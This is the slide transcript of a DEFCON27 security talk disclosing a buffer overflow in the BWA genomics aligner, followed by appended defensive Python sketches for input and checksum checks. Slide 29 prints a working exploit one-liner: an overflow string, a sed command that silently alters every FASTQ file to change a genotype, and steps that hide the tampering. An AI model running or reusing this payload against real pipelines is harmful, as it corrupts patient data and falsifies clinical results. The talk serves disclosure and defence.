From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

DEFCON27 BioHacking Village presentation by Corey Hudson and Charles Fracchia.

In this presentation we describe a previously unreported buffer overflow vulnerability in BWA, a popular genomics alignment software package. We will show how this exploit, combined with well-known attacks, allows an attacker to access and modify patient data and manipulate genomic tests. We then show how this class of attacks constitutes a wider threat to global biomedical infrastructure and what a newly formed team from Sandia National Labs and BioBright is doing about it.

Speaker Bio: Corey Hudson is a computational biologist at Sandia National Laboratories. Corey leads teams in cybersecurity, machine learning, synthbio and genomics. His main work is modeling and simulating cybersecurity risks in realistic and large-scale genomic systems and highly automated synthbio facilities.

Charles Fracchia is a bioengineer who has worked at the intersection of biology and computer science for the last decade. He is the founder and CEO of BioBright, a company dedicated to making biomedical workflows more data-centric and secure.

Published in: Healthcare

  1. 1. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
  2. 2. Corey’s Funding Supported by the Laboratory Directed Research and Development program at Sandia National Laboratories, a multi-mission laboratory managed and operated by National Technology and Engineering Solutions of Sandia, LLC, a wholly owned subsidiary of Honeywell International, Inc., for the U.S. Department of Energy’s National Nuclear Security Administration under contract DE-NA0003525.
  3. 3. What is a Genome’s value? NHGRI Data (2019) Illumina (2018) NHGRI Estimate (2011) $1,000
  4. 4. Growth Drivers: Healthcare and Genomics Athreya et al., 2019
  5. 5. Growth Drivers: Industry, SynBio & Genomics
  6. 6. What issues has this growth created? BROAD Institute Best-Practices Pipeline ARPANET (1971) Change in trust model Need for standardization & automation
  7. 7. Bio is turning Digital: Observation (manual), Subject Selection (manual), Analysis (manual)
  8. 8. Bio is turning Digital: Observation (automated), Subject Selection (automated), Analysis (automated)
  9. 9. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  10. 10. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  11. 11. Critical Workflows rely on digital tools
  12. 12. Critical Workflows rely on digital tools Then?
  13. 13. Where do these tools come from? Academia Business
  14. 14. Where do these tools come from? Academia Business .NET Bio AMPHORA Anduril Ascalaph Designer AutoDock Avogadro Bioclipse Bioconductor BioJava BioJS BioMOBY BioPerl https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software BioPHP Biopython BioRuby CP2K EMBOSS Galaxy GenePattern Geworkbench GMOD GenGIS Genomespace GENtle GROMACS IntGenomeBrows InterMine LabKey Server LAMMPS mothur PathVisio Orange Staden Package Taverna workbench UGENE Unipept VOTCA
  15. 15. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWA BWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  16. 16. Where do these tools come from? Academia Business Instrument Software Electronic Lab Notebooks SpotFire Geneious FlowJo PEAKS IPA LaserGene Geneious SnapGene Gene Construction Kit Sequencher CodonCode Aligner Ingenuity Pathway Analysis GeneSpring JMP Genomics Genevestigator GeneMarker PeakScanner GenomeStudio Analyst Metamorph Volocity Avizo MicroView FCS Express
  17. 17. Just alignment software! Academia Business (tool list repeated from slide 15)
  18. 18. Genomics Data: A Primer Data Flows Data Pipelines
  19. 19. Hacking the Raw Data to Change a Clinical Outcome
  20. 20. Software Pipeline
  21. 21. First tool in the pipeline - BWA
      1. BWA takes FASTQ files as input and maps them to a reference genome, creating a SAM file.
      2. In 2014, BWA developers added ALT-aware mapping, which lets users map reads to a population rather than to a single canonical reference.
      3. Since the population is always changing and requires up-to-date knowledge, the reference is hosted at a central repository.
      4. BWA provides a tool, bwa.kit, which accesses this data from the US National Center for Biotechnology Information (NCBI). NCBI stores and delivers these files as a tarred and gzipped directory of indices: ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_for_alignment_pipelines.ucsc_ids/
      5. The user then unzips and stores the indices provided by NCBI.
      6. A .alt file is used to index the genome and make it ALT-aware.
  22. 22. BWA and the Outside World
  23. 23. A Native BWA Vulnerability: if a .alt file has a line longer than 1024 bytes, it overflows a 1024-byte buffer
  24. 24. Overflowing the buffer
  25. 25. Database indices are delivered unencrypted over FTP. FTP Protocol: no checksums
  26. 26. Modeling the delivery
  27. 27. Crafting an exploit: after the data are mapped, turn a single A at a particular position in the genome into a C. Limits: no other data in the genome can be harmed (can’t turn all A’s to C’s); must change the raw data (make it invisible in follow-on analysis)
  28. 28. How to target the position: the PCR trick. Running Polymerase Chain Reaction (PCR) requires primers. If you wish to find a particular nucleotide in the genome, you need primers upstream and downstream of the nucleotide of interest. Chose A at position 64,544,989 on chromosome 12. Random choice (not clinically meaningful). 7 base pairs upstream and 9 base pairs downstream are sufficient to be nearly unique
  29. 29. Full exploit delivered over MitM: python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 + '/bin/bash -c “sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ; mv .hiddenAltOrig "GCA_000001405.15_GRCh38_full_analysis_set.fna.alt"; cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash > GCA_000001405.15_GRCh38_full_analysis_set.fna.alt (Exploit only runs once, but changes all .fq files)
  30. 30. Aftermath – Finish analysis
  31. 31. Three experiments. Setup: 3 sets of simulated reads in the data directory, finalizing as simulated_reads{A,B,C}.vcf. 1. Unpatched, no exploit 2. Unpatched, payload: sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g 3. Patched, payload
  32. 32. Output of no exploit. Reference: genotype AA at chromosome 12 position 64544989; position 64544989 is absent from the variants or called as A
  33. 33. Output of PayloadA – AC one-direction Reference: Genotype AA at chromosome 12 position 64544989 – output Genotype AC Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
  34. 34. Output of patched file
  35. 35. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  36. 36. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers
  37. 37. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital input
  38. 38. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital output
  39. 39. The Bio-Digital “Stack” Design Build Test Analyze digital input output firmware & OS software & file formats firmware & OS software & file formats
  40. 40. Vulnerability Landscape software buffer overflows, file corruption, etc firmware file formats OS privilege escalation, remote code execution biological DoS, financial attack …
  41. 41. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  42. 42. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  43. 43. A unique constraint of CyberBioSec Scientist vs IT
  44. 44. What needs to happen, starting now 1. Hardened parsers for common formats 2. Bug bounties for key software 3. Instrument manufacturers should publish file format specs & parser code
  45. 45. Asks: Wanna fund bug bounties? Come talk to us. Instrument vendors, come talk to us. Send us sample files! https://bit.ly/2yxzy8I
  46. 46. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
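
Slide 23 ties the overflow to .alt lines longer than 1024 bytes. As a rough illustration of a defensive pre-check (not the authors' patch, and not part of BWA), the sketch below scans a file for lines over that length before it is handed to an aligner. The function names and the exact threshold handling are assumptions made for this example.

```python
import io

MAX_LINE_BYTES = 1024  # buffer size named on slide 23; threshold is an assumption


def find_overlong_lines(stream, limit=MAX_LINE_BYTES):
    """Return (line_number, length) for each line longer than `limit` bytes.

    `stream` is any binary file-like object; line endings are not counted.
    """
    overlong = []
    for number, raw in enumerate(stream, start=1):
        length = len(raw.rstrip(b"\r\n"))
        if length > limit:
            overlong.append((number, length))
    return overlong


def check_alt_file(path, limit=MAX_LINE_BYTES):
    """Hypothetical helper: open a .alt file and report overlong lines."""
    with open(path, "rb") as handle:
        return find_overlong_lines(handle, limit)


if __name__ == "__main__":
    # Toy input: one short line and one 2001-byte line.
    sample = io.BytesIO(b"chr1_alt\t0\tchr1\n" + b"@" + b"A" * 2000 + b"\n")
    print(find_overlong_lines(sample))
```

A check like this only flags suspicious input; the underlying fix still belongs in the parser itself.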
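
Slide 25 notes that the indices arrive over unencrypted FTP with no checksums. A minimal sketch of what a checksum step could look like is shown below, assuming a trusted SHA-256 digest is published through a separate, authenticated channel. That digest and the function names are hypothetical; the slides do not say such a digest exists.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_of_file(path, chunk_size=1 << 20):
    """Compute the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path, expected_hex):
    """Return True only if the file's digest matches the trusted digest.

    `expected_hex` is assumed to come from an authenticated source,
    not from the same FTP session as the file.
    """
    return hmac.compare_digest(sha256_of_file(path), expected_hex.lower())


if __name__ == "__main__":
    # Toy demonstration with a temporary file standing in for an index archive.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"toy index contents")
    trusted = hashlib.sha256(b"toy index contents").hexdigest()
    print(verify_download(tmp.name, trusted))
    os.remove(tmp.name)
```

A digest fetched over the same unauthenticated connection would give no protection against the man-in-the-middle scenario on slide 29, which is why the trusted channel is the key assumption here.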
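
Slide 28 describes locating one nucleotide by its flanking sequence, 7 bases upstream and 9 downstream. The sketch below shows that idea on a toy string: it reports every position whose neighbours match the given flanks, which is also a quick way to check how unique a flank pair is. The flank strings are read off the replacement text on slide 29; the surrounding toy sequence and the function name are made up for the example.

```python
import re


def find_flanked_sites(sequence, upstream, downstream):
    """Return 0-based indices of bases flanked by `upstream` and `downstream`.

    A lookahead is used so that overlapping matches are all reported.
    """
    pattern = re.compile(
        "(?=" + re.escape(upstream) + "[ACGTN]" + re.escape(downstream) + ")"
    )
    return [match.start() + len(upstream) for match in pattern.finditer(sequence)]


if __name__ == "__main__":
    upstream = "CACAGAA"      # 7 bases before the target
    downstream = "GCTAATGGG"  # 9 bases after the target
    toy = "TTT" + upstream + "A" + downstream + "TTT"  # invented context
    sites = find_flanked_sites(toy, upstream, downstream)
    print(sites, [toy[i] for i in sites])
```

Running the same search over a full reference would show how many sites share the flanks, which is the sense in which slide 28 calls them "nearly unique".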
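
Slides 32 and 33 compare the genotype called at chromosome 12, position 64544989, with and without the payload. As a sketch of how such a check could be scripted, the function below reads the genotype for one position from VCF text lines. It assumes a single-sample, tab-separated VCF with a GT field and the chromosome written as "12"; the toy record is invented and is not the authors' output.

```python
def genotype_at(vcf_lines, chrom, pos, sample_index=0):
    """Return the called alleles (e.g. "AC") at chrom:pos, or None if absent.

    None means the position is not listed among the variants, which slide 32
    treats as consistent with the reference genotype.
    """
    for line in vcf_lines:
        if line.startswith("#") or not line.strip():
            continue  # skip header and blank lines
        fields = line.rstrip("\n").split("\t")
        if len(fields) < 10:
            continue  # no FORMAT/sample columns to read
        if fields[0] != chrom or int(fields[1]) != pos:
            continue
        alleles = [fields[3]] + fields[4].split(",")  # REF followed by ALTs
        keys = fields[8].split(":")
        values = fields[9 + sample_index].split(":")
        calls = values[keys.index("GT")].replace("|", "/").split("/")
        return "".join("." if c == "." else alleles[int(c)] for c in calls)
    return None


if __name__ == "__main__":
    toy_vcf = [
        "##fileformat=VCFv4.2\n",
        "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tsample\n",
        "12\t64544989\t.\tA\tC\t50\tPASS\t.\tGT\t0/1\n",  # invented record
    ]
    print(genotype_at(toy_vcf, "12", 64544989))
    print(genotype_at(toy_vcf, "12", 1))
```

Comparing this value across the three experiments on slide 31 would reproduce the AA versus AC contrast the slides report.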
